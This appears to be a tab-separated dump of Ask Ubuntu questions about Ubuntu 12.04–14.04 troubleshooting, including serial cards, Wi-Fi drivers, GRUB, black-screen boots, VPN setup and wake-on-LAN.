/devices/pci0000:00/0000:00:1a.0/usb1/* , env { id_seat } = '' seat1 ''
477344	startech pci2s550 serial card on shared irq	first of all i’m totally new to linux and have been overwhelmed with all the information on setting it up . so with that please bear with me and my silly questions . i’m trying to install a startech dual rs232 card ( # pci2s550 ) on ubuntu 14.04 system and have run into a couple things that are stumping me . mostly related to the instructions provided by startech , and in trying to follow them i now have two ttys ports on the same irq ( i think ) . when i used “dmesg | grep tty” i get the following : [ 0.000000 ] console [ tty0 ] enabled [ 0.652826 ] 0000:02:00.0 : ttys4 at i/o 0xdf00 ( irq = 21 , base_baud = 115200 ) is a 16550a [ 0.673119 ] 0000:02:00.0 : ttys5 at i/o 0xde00 ( irq = 21 , base_baud = 115200 ) is a 16550a and when i use “sudo setserial -g /dev/ttys [ 012345 ] ” it shows /dev/ttys0 , uart : unknown , port : 0x03f8 , irq : 4 /dev/ttys1 , uart : unknown , port : 0x02f8 , irq : 3 /dev/ttys2 , uart : unknown , port : 0x03e8 , irq : 4 /dev/ttys3 , uart : unknown , port : 0x02e8 , irq : 3 /dev/ttys4 , uart : 16550a , port : 0xdf00 , irq : 21 /dev/ttys5 , uart : 16550a , port : 0xde00 , irq : 21 so my questions are : 1 ) is it ok to have two comm ports on the same irq ? 2 ) is ttys0 to ttys3 available ? and if so would it be better use them ? 3 ) what is the right way to see what irqs are really being used ? 4 ) what is the best way to test the serial ports ?
477346	wireless-n 7260 with ubuntu 14.04 not working	i just bought a lenovo yoga 2 notebook and 2 days after buying i decided to install ubuntu 14.04 . the installation was smooth and everything seemed to be working pretty fine , but the wireless card was n't . the weirdest part is that i was using dual boot , so i had ubuntu 14.04 and windows 8 in the same machine so i tried to boot into ubuntu to find a solution for teh wireless card problem and the wifi was not working on windows anymore : ) i tryed everything to make it work ( clean format with only w8 again , 2 times ) and nothing worked . so now the problem is with windows and ubuntu . when i check the driver , it says that is working properly but when i run the diagnosis in windows i see actually taht the drivers are ok but it says that the radio is turned off . i 've tried really everything and nothing seems to be working . did anyone have this problem before ?
477350	is there a way to lock my volume settings in l/ubuntu ?	every now and then it seems that some application has taken control of my mic volume settings and/or completely turned it down to 0 . at the worst of times i load up alsamixer and find that the elected mic input has been removed or changed ( going off a fuzzy memory here but you get the gist ) . is there some way to force some or all of the volume settings to stay as they are ? i.e . lock them ? perhaps the only volume that i do n't mind being adjusted would be the obvious `` master '' volume in playback mode . apart from that , no application should be allowed to fiddle and mess with things .
477351	broadcom card not working	just installed lubuntu 14.04 . like so many others , ca n't get the broadcom card to work . have tried just about all the recommendations i can find , but still no luck . ethernet works fine , but there is no scanning for available networks . i 'm on a dell inspiron 910 , with broadcom 4312 , pci id [ 14e4:4315 ] , subset [ 14e4:04b5 ] card . iwconfig givesno wireless extensions : for both lo and eth0 . i have run sudo apt-get update and sudo update-pciids . have run sudo apt-get purge bcmwl-kernel-source and sudo apt-get install linux-firmware-nonfree . have rebooted with and without the ethernet cord attached . not sure anymore whether the wireless key is on or off , so i have to try it both ways ( i wish there was an indicator light ! ) additional drivers shows linux sta wireless driver source from bcmwl-kernal-source ( proprietary ) marked as `` do not use . '' using non-free firmware for linux kernel drivers from linux-firmware-nonfree . help ! and thanks !
477352	how can i keep password for a folder ?	i want to keep password for my important folder where my all the documents are kept so how can i keep password for it ?
477353	whenever i install ubuntu it says please use a kernel appropriate for your cpu	whenever i try to install ubuntu it says the kernel is not appropriate for my cpu . or tell me an os that 's minecraft capable and for an i686 processor .
477357	increase height of onboard in lock screen	on my tablet i use a fresh install of trusty with gnome flashback compiz session . at login screen gnome provides an own on-screen keyboard which is kind of ok . within the session i use onboard in normal mode and i enabled it for the unlock screen as well . there it is a little bit too small and i found no way to increase its height . adjusting the docked height of onboard does not affect the appearance within the lock screen ( where it is docked automatically with no option to change this ) . is there a possibility to increase the dock styled height of onboard at gnome lock screen ? if not , is it possible to display onboard normally ( not docked ) at gnome lock screen ? if none of them , i am open for proposals of onboard alternatives . thanks in advance , nicolas
477362	`` connection activation fail '' s with a network that i already used	i was able to connect to a wi-fi a couple of days back . now whan i try to connect to the same wi-fi , i get an error saying connection activation failed ( 1 ) creating object for path '/org/freedesktop/networkmanager/activeconnection/15 ' failed in libnm-glib.. i 'm not sure why this is happening . i noticed that people who faced similar problem tried to connect to the internet using a usb stick or some other custom hardware . but this is not the case with me . its a normal wi-fi . i may have updated several packages on my laptop during the time butg i 'm not sure which update/install caused this . i am using ubuntu 14.04 can anyone help ? thanks !
477366	um-one usb midi not detected	on a fresh install of ubuntu 13.10 the usb device is flaky . when booted it is not detected . trying to see it in kminimon and it is not there . when manually unplugging it and reinserting it in the same socket , then going back to kmidimon to connections and have it detect it , then it works . sometimes on um-one 20:0 and other times on um-one 24:0 . i need it to be stable and to either 20:0 or 24:0 but not switching between them . this usb midi cable is connecting virtual pipe organ keyboards and controls and these settings are stored for future uses . however when booting at a later time all the settings need to be changed since the usb settings change from 24:0 to 20:0 how can this device be auto detected on boot up and set to be either 24:0 or 20:0 each subsequent boot ? mike
477367	ubuntu 14.04 wired bsnl broadband connection problem	how to set up a bsnl ( wired ) broadband connection using ethernet wire on ubuntu 14.04 ? using this as posts ' solution how to set up a broadband connection , i performed the following steps : connect your ethernet wire to the port at the back of your computer . fire up the terminal and type in sudo pppoeconf it should detect your modem . keep on pressing enter . fill in your user name and password when indicated . it should be easy to stick on to defaults . you should be prompted back to your terminal when it would say pppoe loaded . simple . that 's the end of terminal . now i went to the networking icon and tried connecting to activate the wired connection . but i still can not connect ? help ! !
477368	i want to build a media server . media only . is this possible with ubuntu ?	i just completed machine re purposing number 3 . we want to build a media server for music , pictures , and video . everything must come from used sources , or be free . how do i configure a server to run in this environment . thanks
477370	ubuntu 14.04 boots to black screen after upgrade from 13.10 - no display , problem seems to be x connected	i just spent a day trying to work around my newly upgraded ubuntu 14.04 booting into a black screen without success and becoming seriously desperate . what i did : upgrade to 14.04 lts from 13.10 via command line . everything proceeded without problems . the status now : grub shows . after i select any ubuntu starting option i still have on my system , the ubuntu start screen with the dots appears , changes into a black screen with a white cursor in the upper front corner . at this stage nothing will get me out of this besides a manual restart ( alt + f1 or f2 does not work , no keyboard reactions otherwise ) . this effect also happens with the ubuntu 13.10 kernel stilled imaged on the system . graphics failsafe modes wo n't boot at all . i can get to a text mode boot via selecting recovery mode and from there return to normal boot -- > login to 14.04 works , but no display is recognized . my system : thinkpad x1 , dualboot with windows 7 . intel hd 4000 graphics card . there is no file /etc/x11/xorg/conf . lspci -nnk | grep -ia3 vga yields : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : lenovo device [ 17aa:21f9 ] kernel driver in use : i915 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) /usr/lib/nux/unity_support_test -p yields : no protocol specified error : unable to open display what i tried : many suggested solutions from other forum threads , including resetting unity , dpkg -- reconfigure , several installations and re-installation of fglrx / nouveau / nvidia graphics drivers , reinstalling x , ... ... . booting 14.04 from a live usb , which works great and enables me to write this post , but i do n't manage to fix my local 14.04 installation
477375	install jitsi from ppas ?	i can not find the ppa sources for the voice/video and instant messenger chat jitsi . how do i install it with apt ? apt-get install jitsi
477377	ubuntu 14.04 stalling with black screen w/ white cursor	the system will get to the plymouth 'ubuntu ' screen , load load , all dots filled , switches over to lightdm , but wait ! no lightdm . : i just a blank screen with that white cursor . ca n't switch out to tty1-6 - not sure if the ctrl-alt-f1 is disabled in 14.04 or if its literally just locked down . if i change any files , i have access to the filesystem from my windows 8 partition . that 's it . : / i only changed a few things recently , but do n't know if one was a cause . i switched to the numix theme ( from ppa ) , installed lm-sensors and psensor ( ran all the i/o probes ) , ubuntu tweak , pinta , and well , team fortress 2 on steam . : p i 'm not new to linux , but this has me stumped . any help would be greatly appreciated . thanks ! update i was just able to get into my desktop briefly . i booted ubuntu . when the black screen froze , i hit ctrl-alt-del . it rebooted . i plugged the second monitor in i had been using before the issue ever came about . plymouth displayed on both . lightdm came up , displayed on both ( it used to show only the ubuntu logo on the unfocused monitor though ) . i logged in just fine . even ran some pending software updates . i logged out of the desktop though , and lightdm refused to show again . xp update got in again . it 's been giving me an error ( for a couple weeks actually ) . did n't really think it was related ... sdb:6:0:0:0 : [ sdb ] assuming drive cache : write through sdb:6:0:0:0 : [ sdb ] assuming drive cache : write through sdb:6:0:0:0 : [ sdb ] assuming drive cache : write through ... but i put two-and-two together , took out the sd card i always leave in the slot , rebooted , and it started up just fine . i obviously ran here to give an answer , but had a feeling i should reboot just to make sure . good thing . it did n't let me in the second time . same black screen , white cursor . '-_- ) update i just went through recovery mode , just installed gdm and switched over to that as my dm . for the heck of it , i ran plymouth in debug . my plymouth debug log
477378	adobe flash trouble	browser games such as king 's road wo n't run in linux for me , because i need to download adobe flash 12.0 apparently , but when i follow the links given in the dialog box where i am informed of this , none of the options to download seem to render any results . the option to download for linux 10.0 + is simply unresponsive and the options that are responsive only download a folder with what is apparently nothing but text files . i am new to linux and would appreciate any help .
477382	zentyal pdc on maas	ok , so i may be smoking crack here , but feel free to tell me ... ; - ) i currently have a server running ubuntu 12.04 lts and zentyal 3.3 , with the latter configured as my primary domain controller ( pdc ) . together with a few other servers , i 'd like to migrate this system to an ubuntu 14.04 lts-hosted openstack cloud . the first issue i 'm attempting to overcome is how to configure dns & dhcp . currently , my pdc acts as my network 's server for dns and dhcp queries . i have installed an ubuntu 14.04 lts-based maas region controller that will control/host the other virtual & physical servers . which brings me to my first question : is it possible ( or even a good idea ) to have a virtual pdc provide dns/dhcp services ? if i keep the pdc as the primary dns/dhcp server , how do i configure these services under zentyal on the pdc , and how do i configure the maas server to work with the pdc 's dns & dhcp services . alternatively , and this is my preferred option because of the pdc being a vm , if i configure the maas server as the primary dns/dhcp , how do i configure zentyal on the pdc to work with the maas dns/dhcp ?
477388	partitioning in ubuntu with gparted cant resize	i opened gparted and as i can see i have 3 partitions ( or i think so ) first one sda1 ( 236 mb ) its ext2 type file and its booting point , second one is sda2 ( rest of the hdd 1.36 tb ) extended ntfs type file and i have third one that is within the sda2 called sda5 it takes the same space as sda 2 and its file type is crypt luks , so when i try to resize the sda2 i cant resize it not for even 1 mb , i dont know if that crypt luks file is causing the problem , so i dont know what to do , by the way i can format the crypt luks ( sda5 ) file that in inside sda 2 but i dont know if i should.can anyone help me please ? here are the pictures when i open gparted when i try to resize sda 2 i think i did use encryption i mean while it is booting i type password and its says sda5/scrypt set up succefully or something like that and then it goes to my login screen where i type username and pass that is it
477391	( noob ) can i safely use boot repair to convert to efi mode if i have a dual boot os x machine ?	noob question here but i want to make sure i do n't nuke my dual install . i 'm following these directions to install an ubuntu partition on my os x mbp retina . i 'm at the part where i should use boot repair to convert to efi mode , but if i tick `` separate /boot/efi partition '' the option it gives is `` sda1 . '' however , to the best of my knowledge that 's where i have os x files . i have ubuntu files on sda4 ( boot loader ) , sda5 ( main partition ) , and sda6 ( swap ) . i 'm worried that proceeding with these instructions is going to do something bad to my os x partition . can someone please tell me if this is safe , and ideally help me to understand a bit more what 's going on here ? i 'm new to linux and would very much appreciate the guidance . thanks !
477393	unable to install ubuntu ( compiz unresponsive i believe )	heyoh , little bit of a linux veteran but i 've never run into this before . i just got a new desktop pc and it has windows 7 on it . i 'm looking to dual boot ubuntu 14.04 on this set up but i keep running into an issue in the live environment . i can open windows ( like gparted or firefox ) and even start ubiquity . but ubiquity will become unresponsive before getting partitioning to start . the real issue or what i believe is the source of the problem is that all the compiz elements of my screen are unresponsive . i can switch windows with keyboard but as far as clicking window titlebars to drag windows or using the max , min , and close buttons nothing works . i ca n't even click the shutdown buttons in the top right . to reboot i have to switch the x display and run sudo reboot . my hardware is as follows : ati radeon hd 7850 graphics card 8 gb of crucial ballistix ram amd 6100 bulldozer processor and an asrock motherboard i ca n't remember the make/model and the box is not around any longer . i am also running dual monitors if that is relevant . if you need more information or the results of any linux commands i may be able to fenangle them into the post with keyboard fu and i would be more than happy to try .
477403	how to force update-grub to use uuid ?	when i run `` update-grub '' , the file `` grub.cfg '' will contain lines like this . menuentry 'ubuntu ... ' { ... linux /boot/vmlinuz ... root=/dev/md124 ... ... } for the line of linux , is it possible to let it use uuid ? like , linux /boot/vmlinux ... root=uuid=xxx right now , every time after i do update-grub , i have to manually edit the line to use uuid . otherwise , the boot will fail . thanks for the help .
477407	ubuntu login problems - ca n't type in username password	just build a computer and when i go to log in it does n't type or move even if i type my password in and hit enter . what should i do ?
477409	ubuntu 12.04 64-bit vpn server not changing ip	i 'm trying to set up an vpn server on vps with several additional ips . i 'm getting connected remotely to vps , but it 's not assigning ips which i defined in /etc/pptpd.conf i used this guide : how to : pptp vpn on ubuntu 12.04 ( pptpd ) to set up a vpn server over vsp and it worked fine . i 'm able to connect to the server from the external location , but the problem is that my ip on the local machine is being changed to `` localip '' not `` remote ip '' . for example , `` localip '' = 192.0.0.127 , and `` remote ip '' = 192.0.7.127 . so my ip is being changed to 192.0.7.127 . this is n't what i expected . this is what i get from tail -f /var/log/syslog : june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < info > unmanaged device found ; state connected forced ( see http : //bugs.launchpad.net/bugs/191889 ) june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < info > marking connection 'wired connection 1 ' invalid . june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < warn > activation ( eth1 ) failed . june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) complete . june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < info > ( eth1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < info > ( eth1 ) : deactivating device ( reason 'none ' ) [ 0 ] june 6 00:09:19 instant5860 networkmanager [ 1456 ] : < info > unmanaged device found ; state connected forced . june -- -- - avahi-daemon [ 440 ] : withdrawing address record for fe80 ... ... ... on eth1 jun -- -- -- avahi-daemon [ 440 ] : leaving mdns multicast group on interface eth1 . ipv6 with address fe80 ... .. jun -- -- -- avahi-daemon [ 440 ] : interface eth1.ipv6 no longer relevant for mdns . jun -- -- -- avahi-daemon [ 440 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 ... . jun -- -- -- avahi-daemon [ 440 ] : new relevant interface eth1.ipv6 for mdns jun -- -- -- avahi-daemon [ 440 ] : registering new address record for fe80 ... .. on eth1.* . jun - snmpd [ 1172 ] : error on subcontainer 'ia_addr ' insert ( -1 ) dbusp382 ] : [ syste ] activating service name='org.freedesktop.packagekit ' ( using servicehelper ) aptdaemon : info : initializing daemon aptdaemon.packagekit : info : initializing packagekit compat layer dbus [ 382 ] : [ system ] successfu ; ; y activated service 'org.freedesktop.packagekit' aptdaemon.packagekit : info : initializing packagekit transaction aptdaemon.worker : info : simulating trans : /org/debian/apt/transaction/233beca013a0473ea34d9dea805af5df aptdaemon.worker : info : processing transaction /org/debian/apt ... aptdaemon.packagekit : info : get updates ( ) aptdaemon.worker : info : finished snmpd [ 1172 ] : error on subcontainer pptpd [ 23611 ] : ctrl : client 82.33 ... . control connection started pptpd [ 23611 ] : ctrl : starting call ( launching pppd , opening gre ) pptpd [ 23611 ] : pppd 2.4.5 started by root uid 0 pptpd [ 23611 ] : using interface ppp0 pptpd [ 23611 ] : connect ppp0 < -- > /dev/pts/1 networkmanager [ 1456 ] : scplugin - ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) networkmanager [ 1456 ] : scplugin - ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . pptpd [ 23612 ] : peer from calling number 82 ... authorized . kernel : [ 2918261.416923 ] init : ufw pre-start process ( 23613 ) terminated with status 1 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 7 ctrl : ignored a set ling info packet with real accms ! local ip address:109.0.121.197 remote ip address : 109.0.84.56 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 13 networkmanager [ 1456 ] : < warn > ( eth1 ) : dhcpv4 request timed out . networkmanager [ 1456 ] : < info > ( eth1 ) : canceled dhcp transaction , dhcp client pid 23280 networkmanager [ 1456 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... networkmanager [ 1456 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) started ... networkmanager [ 1456 ] : < info > ( eth1 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 [ networkmanager [ 1456 ] : < info > unmanaged 'ia_addr ' insert ( -1 )
477410	unity gone after installing nvidia prime	i wanted to replace bumblebee with nvidia prime for more performance . i used these commands : sudo apt-get purge libvdpau-va-gl1 bumblebee* nvidia* sudo apt-get install nvidia-331 nvidia-settings nvidia-prime then i rebooted . at first everything looked fine . nvidia drivers was enabled with perfect graphic performance . then i tried to use power saving mode ( intel card ) from nvidia settings . it said i have to log out and log in . i did as it said and then , unity was gone . no launcher , no top bar , no folders and shourtcuts nothing but my wallpaper and cursor . right clicking or ctrl + alt + t did n't work either . i could get unity back when i reinstalled drivers and prime with commands i gave above . i tried to reinstall bumblebee , get back to nouveau drivers , using different versions of drivers but none of them helped . i do n't want to reinstall my system just because of this so can anyone help me about this ? how can i use prime properly or at least get back to bumblebee ?
477412	unable to connect to internet on desktop via ethernet	desktop computer it 's not connecting to internet via ethernet . it shows the loading connection animation on the top panel but it never connects , it just keeps loading ... the network card is nvidia corporation mcp61 ethernet any fixes for this problem ? ďťż using ubuntu 12.04
477416	how to fix white screen areas ?	i do n't know what 's happening . i 'll have stuff open and i 'll get weird white spots on my screen . it goes away when i click on it . how can i fix it ?
477417	problem with grub booting to ubuntu command prompt	so i was trying to get my ubuntu server to boot to command line to reduce graphical overhead . i followed the instructions from this thread here . now when i boot i get to the grub screen , click enter and a black screen with a blinking cursor shows up . i have already tried editing the startup and removing the `` text '' part after `` quiet splash '' but to no avail . any ideas ? im running version 14.04 .
477420	how to split currently used partition on ubuntu server ?	i would like to split a currently used partition that is mounted to /usr directory . i did this because / only had 1 gb of data allocated to it . now , i did not account for the /home directory when i made this partition ( or i would have made two partitions ) . so i have 14 gb mounted to usr/ with 12 gb free . is there a way i can reclaim the free space on this partition to make another partition to mount to /home ? here is the result of a df -h : i have tried to split the /dev/mmcblk1p4 into 2 different partitions but i was not able to save the partition table correctly .
477423	radeon driver issues	when i try to use the radeon driver through prime , my x just crash and then restarts at the login screen . i could n't get a working xorg.conf too , but i think that is not related , since it do n't work for both intel and radeon
477425	how to install dropbox on ubuntu 14 server [ gui-less ] ?	i followed the steps in this link from dropbox website : https : //www.dropbox.com/install ? os=lnx but when i run the ~/.dropbox-dist/dropboxd nothing happens ... i do n't see the message ... i also followed this tutoral ( http : //www.dropboxwiki.com/tips-and-tricks/install-dropbox-in-an-entirely-text-based-linux-environment ) and similars but i do n't see any message in the output . what else can i do ? the program is being executed ... it just gets stuck in the terminal without any message ... it creates the directory ~/.dropbox-master and ~/.dropbox , but nothing else happens ...
477426	what desktop enviroment is most efficent ?	i do n't really care if the desktop environment is quick . what i want is a desktop environment that lets me open apps and get things done the fastest . i do n't care about flashiness or anything . read : i am not looking for the desktop environment that is the lightest . i am looking for the one that lets me open an app and use it most effectively , to minimize , for example , the time it takes me to open libreoffice and write up an essay for school . i want to be super efficient .
477430	microphone only works on sound recorder , not even on settings - ubuntu 12.04.4	i have a problem . i got an acer zg5 netbook with ubuntu 12.04.4 installed and fully updated . i installed skype and i discovered that the microphone is not working . i immediately went to sound settings and to the input tab . then i observed that the input level bar was empty while i was speaking . this probably mean that the sound settings do n't recognize the netbook mic . ironically , the microphone works when using the ubuntu sound recorder application . so this means that there must be a way for it to work . how can i fix the mic in both sound settings and skype ? ( a possible temporary-complex solution that i got in mind is to redirect somehow the microphone input stream from the sound recorder application that works fine to skype . but i do not know how . ) thanks in advance ! useful information : in skype sound settings , microphone is set as pulse audio , and in sound recorder as master and these are the only options ( i.e i can not change them , at least via the gui ) .
477432	how to properly enable usb support on virtualbox	how to enable the usb support on virtualbox properly ? i 've just enabled it like the below screenshot shows ( iomega select hdd ) , but , my windows 7 virtual machine would n't detect the usb . what 's wrong please and how to fix it ?
477434	can not install canon mg6350 drivers - libtiff4 is not installed - ubuntu 14.04	i am having problems installing my canon mg6350 multifunction printer drivers on ubuntu 14.04 . when i run the install.sh in terminal i get an error that libtiff4 is not installed . ubuntu 14.04 has libtiff5 . these drivers where made to be compatible with ubuntu 12.04 . how can i fix my problem ? installing old libtiff4 , would work for me ? if so , how ? thanks in advance !
477435	can not boot from sd card/flash drive on macbook pro 13 '' - boot fails after purple screen	it 's my first time using ubuntu and i have run into some problems . i have a 16gb usb flash drive and 16gb sdhc card . i would prefer to use the sd card but either will do just fine if it helps with the solution . i have a 13 '' macbook pro with no hard drive deeming the machine useless without an os . i thought i could substitute the hard drive for a 16gb sd card with an ubuntu iso on it . i would like to plug in my sd card into my macbook pro , boot the ubuntu iso and do simple things such as use the browser for internet . the problem : whenever i boot my macbook pro with the sd card that has the ubuntu iso , it loads at the purple logo screen and does not function . how can i resolve this issue ?
477436	fix slow motion sound	i have just installed ubuntu 14.04 on vmware ( windows 8 as host ) . the problem is that when i try to watch a video on youtube , both video and sound are slow motion . it also happens when i try to listen to online radio as well . why do i get `` slow motion sound '' , and how can i fix it ? ( i previously had 12.10 , and i did not have any problem with the sound . )
477437	how to open the ports on firewall in ubuntu ?	i 'm pretty new to ubuntu . i just want to open the most common ports namely ftp ( port 20 tcp/udp ) http ( port 80 tcp/udp ) smtp ( port 25 tcp ) etc i 've tried all the ways in iptables , ufw , and gufw . in the end , it still remains unchanged with the same error : connection refused . i ca n't even access the home page on http port : 80 from the other device .
477442	install ubuntu without setup	i 'm trying to create an ubuntu install script which will install ubuntu onto a machine such that , at next boot , the user will be prompted to perform the normal setup tasks such as picking a system language , username , password , etc , much like when you buy a new mac or pc ( and , i presume , a new laptop with pre-installed ubuntu , although i 've never done that , so i 'm not sure ) . are there utilities or installation options which make this possible ? if not , any ideas on how i might tackle this ? i do n't need explicit code , just some ideas to point me in the right direction . thanks !
477445	confused about app icons folders	actually , there are at least 4 or 5 folders where icons are stored ! i 'm confused . i never liked those linux folders organization when you are the only , and begginer user . i would like to change/add app icons , for example , when a scalable one is n't provided . however i have to dig into these directories , because some .desktop app files just gives the name of the app assuming the os knows where to find them . /usr/share/icons /usr/share/pixmaps /usr/local/share/icons /usr/local/ { app-name } /icons/hicolor/scalable ~/.local/share/icons/hicolor/ { size } /apps/ in pixmaps folder i found icons in .xpm format . they are usually 16x16 or 32x32 . however there are apps which seems to have scalable ones somewhere .
477449	make parent directories as needed in nautilus	a standard context menu item of nautilus is `` new folder '' , which can be used to create a new directory in the directory focussed . an option of the command mkdir is -p , which can be used to `` make parent directories as needed '' . so , for example , the command mkdir -p mydirectory/mysubdirectory could be run in an empty directory , creating the directory mydirectory in the working directory and the directory mysubdirectory in the directory mydirectory . how can similar behaviour be instated in nautilus ? is there this capability built-in ? is there a context menu add-on for nautilus that could create these directory structures at once ? edit : example code so , for example , how could a command such as the following ( using zenity ) be instated in a nautilus context menu command for running on the directory focussed in nautilus ? mkdir -p `` $ ( zenity -- title `` make directory structure '' -- text `` enter the directory structure : '' -- entry ) ''
477455	how do i mount an external drive in a kvm virtual machine ?	i have a vm running a database under virt-manager and ubuntu 14.04 . i want the db to use a drive that is external to the vm . that way i can just increase the size of the drive any time i need to . i 'm assuming dynamically increasing the disk size is not possible with kvm ( as it is with parallels and others ) . so how can i mount a drive ( or .img file ) that is external to the vm ?
477456	how does postfix send mail without smtp settings ?	i am running vagrant . in it , i have ubuntu 14.04 server and installed postfix . i am able to send email using sendmail someone @ gmail.com ( after typing in body etc . ) this works . how is postfix able to send email to gmail even though i configured nothing about postfix ( did not specify any smtp settings for my gmail accoun , for example ) also , postfix looks like a full-fledged email server ? what can i install so that i can send email without having to install postfix ( and without giving any smtp settings for this program x ) ?
477457	setting up programs to startup at login	have a new ponder hoping someone can answer . keep in mind i am very new at linux and ubuntu 14.04 . what i would like to setup is setting certain programs to load at login to my account . i have not found a startup folder or setup options for programs to load at startup . any ideas ? please remember i am very new to linux and ubuntu desktop . i am still learning my way around and the code for terminal sessions . so please be very descriptive in responses . thank you ...
477461	what 's hotplug in ubuntu	many questions are tagged : hotplug . however , no wiki found in : http : //askubuntu.com/tags/hotplug/info i 've read this : modularized usb drivers are loaded by the generic /sbin/hotplug support in the ker- nel , which is also used for other hotplug devices such as cardbus cards . therefore , could we say that hotplug is the responsible on loading/unloading modules automatically ?
477464	ubuntu 14.04 unity not functioning , no launcher	yesterday i turned my computer to find that the launcher was missing . in addition , i could not using ctrl-alt-t would bring up a blank white screen . the only terminal could be found by clicking ctrl-alt-f1 . i used ccsm to turn on unity . unity panel service was working . i installed tweak tool . i did all the troubleshooting i could find related to this subject . nothing would work . i ultimately reinstalled ubuntu 13.10 . also , i do not have an nvidia graphics card . i have an intel integrated graphics controller . some of the troubleshooting i tried were found : unity does n't load , no launcher , no dash appears ubuntu 14.04 unity desktop without panel and launcher how to fix : no unity , no launcher no dash in ubuntu 14.04 http : //ubuntuforums.org/showthread.php ? t=2008891
477466	transfering files over from a windows mounted to ubuntu	i 've mounted the windows partition via mount . i can access my files and look through them all , but when i try to transfer all the pictures only about 1000 transfer before it starts saying it is a read-only file system . so what information can i provide to help resolve my issue .
477470	two home and boot partitions after installing ubuntu 14.04 and downgrading to ubuntu 12.04	i have ubuntu 12.04 lts and i am experiencing some problems . i did n't have ubuntu 12.04 on a drive to install it but i did have ubuntu 14.04 . so i installed it and downloaded ubuntu 12.04 using ubuntu 14 . now , i have 2 home partitions and 2 boot partitions . one home and boot is mounted at /media and the other one is /home and /boot . i can not get rid of /media/home and /media/boot even using gparted . how do i get remove them ?
477474	make it so you ca n't stop command with ctrl+c	so , i was playing some zork 1 and i went to copy some text to show a friend of mine , but i accidentally forgot to hold the shift key when pressing ctrl+c . this stopped the command and i lost my zork data ... is there some sort of `` helpful '' tip out their that i can use to prevent stopping the command when press the keys ctrl+c ? note that i 'm running the game zork via frotz on the terminal ( emulator ) , i installed it from the steps given on this website here
477478	error when compiling bochs	i 'm trying to compile bochs . here is my configure command : ./configure -- enable-fpu -- enable-3dnow -- enable-x86-64 -- enable-a20-pin -- enable-cdrom -- enable-debugger -- enable-debugger-gui -- enable-disasm then i enter the `` make '' command and it compiles for some time . but then comes an error . /usr/bin/ld : gui/libgui.a ( gtk_enh_dbg_osdep.o ) : undefined reference to symbol 'pthread_create @ @ glibc_2.2.5' //lib/x86_64-linux-gnu/libpthread.so.0 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make : *** [ bochs ] error 1 can anybody help me with this error ? thank you in advance .
477480	notepad++ - can not launch firefox	i am running ubuntu 14.04 and notepad++ 6.6.4 ( through wine ) under the 'run ' tab , i clicked on `` launch in firefox '' , but nothing happened i uninstalled notepad++ and wine , then shutdown . i re-installed notepad++ and wine and still have the same problem . does anyone know what the problem is ?
477481	how to uninstall ubuntu server 14.04 amd64	how to uninstall ubuntu , i ca n't boot into ubuntu because i forgot my password.i do n't have any window live cd , but have window vista and xp , and have ubuntu server live cd.i have tried with grub loader , but still ca n't uninstall.please someone help me .
477482	transfer a ssh session between the same physical devices from one network to another	my server has 2 ip addresses via two networks . due to some restrictions , my client will be able to access only one of the network at a time . hence , i want a way to transfer a live ssh session with all the open applications seamlessly from one network to another . the physical devices ( client and the server ) are the same . what changes is the network through which it connects . can this be done ? thanks !
477483	guake does n't start , throws ' can not open shared object error '	i am using ubuntu 12.04 . i have installed guake but i can not run it . this is the error i get . $ guake traceback ( most recent call last ) : file `` /usr/lib/guake/guake.py '' , line 40 , in < module > import globalhotkeys importerror : libpython2.7.so.1.0 : can not open shared object file : no such file or directory how can i solve this problem ? cheers ,
477489	how to uninstall avira antivirus from ubuntu 14.04 ?	i installed avira on my ubuntu now . these are the commands i used to install avira : wget http : //dlpe.antivir.com/package/wks_avira/unix/en/pers/antivir_workstation-pers.tar.gz tar xvzf antivir_workstation-pers.tar.gz sudo ./antivir-workstation-pers-3.1.3.5-0/install after installation i tried to open avira by searching it in the computer , but its not found anywhere . because of this i want to uninstall it . how to uninstall it ?
477490	menus are being placed below windows ' titlebars	i upgraded 12.04 to 14.04 last night . i 'm using unity . after upgrade this is what it looks like . how to place these menus back in global menubar ? i have n't touched any compiz settings . thanks in advance !
477492	wol upstart script wo n't run upon reboot 12.04.4	i am trying to enable wol and followed this answer : how can i enable wake-on-lan permanently ? as per the link , i created an upstart job to enable wol upon reboot . script is : start on started network script for interface in $ ( cut -d : -f1 /proc/net/dev | tail -n +3 ) ; do logger -t 'wakeonlan init script ' enabling wake on lan for $ interface ethtool -s $ interface wol g done end script named the script wakeonlan.conf and it 's located in /etc/init/ . i can start the job by : sudo service wakeonlan start this starts successfully and wol is enabled on eth0 . however on reboot , the upstart job fails to start . the wakeonlan.log shows : can not get current wake-on-lan settings : operation not supported not setting wol i 'm not sure what to do next ?
